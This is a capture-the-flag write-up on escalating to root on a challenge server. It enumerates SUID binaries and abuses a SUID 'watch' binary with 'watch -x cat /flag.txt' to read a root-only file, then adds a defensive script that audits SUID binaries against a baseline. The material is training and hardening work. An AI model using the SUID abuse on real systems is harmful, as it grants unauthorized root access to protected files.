MARTINA Challenge #2 - Penance
This challenge can be found when Martina makes a run for it.
The Setup
Help Martina break into Penance's servers!
Try to gain root level access to the system and read the /flag.txt file.
You are also given a command you can use to gain user access to a remote server using ssh.
The Privilege Escalation
Once we SSH into the server as a regular user, we need to find a way to escalate our privileges to root and read /flag.txt.
The first thing to check is SUID binaries - programs that run with the permissions of their owner (often root) regardless of who executes them:
$ find / -perm -u=s 2>/dev/null
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/bin/umount
/usr/bin/chsh
/usr/bin/newgrp
/usr/bin/chfn
/usr/bin/gpasswd
/usr/bin/watch
/usr/bin/mount
/usr/bin/su
/usr/bin/passwd
Most of these are standard system binaries, but /usr/bin/watch stands out as potentially exploitable. The watch command normally runs other commands repeatedly, but with the -x flag it can execute commands directly.
Since watch has the SUID bit set and is owned by root, we can use it to read files with root privileges:
$ watch -x cat /flag.txt
This executes cat /flag.txt with root permissions, giving us the flag!
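From the defender's side, the same find output can be compared against a baseline so that an unexpected SUID binary such as /usr/bin/watch is flagged before anyone else finds it. The script below is an added example, not part of the original write-up; the baseline list, the function names and the --live switch are assumptions made for illustration.

```shell
#!/bin/sh
# Added example: audit SUID binaries against an expected baseline.

# Constructed baseline (assumption): SUID binaries expected on this host.
# Build a real one from a known-good image of the same distribution.
expected_suid() {
  cat <<'EOF'
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/bin/umount
/usr/bin/chsh
/usr/bin/newgrp
/usr/bin/chfn
/usr/bin/gpasswd
/usr/bin/mount
/usr/bin/su
/usr/bin/passwd
EOF
}

# Sample input: the same paths as the find output in the write-up.
sample_find_output() {
  expected_suid
  printf '/usr/bin/watch\n'
}

# Print each path read from stdin that is not in the baseline.
unexpected_suid() {
  baseline=$(expected_suid)
  while IFS= read -r path; do
    [ -n "$path" ] || continue
    printf '%s\n' "$baseline" | grep -qxF -- "$path" || printf '%s\n' "$path"
  done
}

# Turn each flagged path into the command that clears its SUID bit.
# The commands are printed for review rather than executed.
remediation() {
  while IFS= read -r path; do
    printf "chmod u-s '%s'\n" "$path"
  done
}

# --live audits the local filesystem; the default runs on the sample input.
if [ "${1:-}" = "--live" ]; then
  find / -xdev -type f -perm -u=s 2>/dev/null | unexpected_suid | remediation
else
  sample_find_output | unexpected_suid | remediation
fi
```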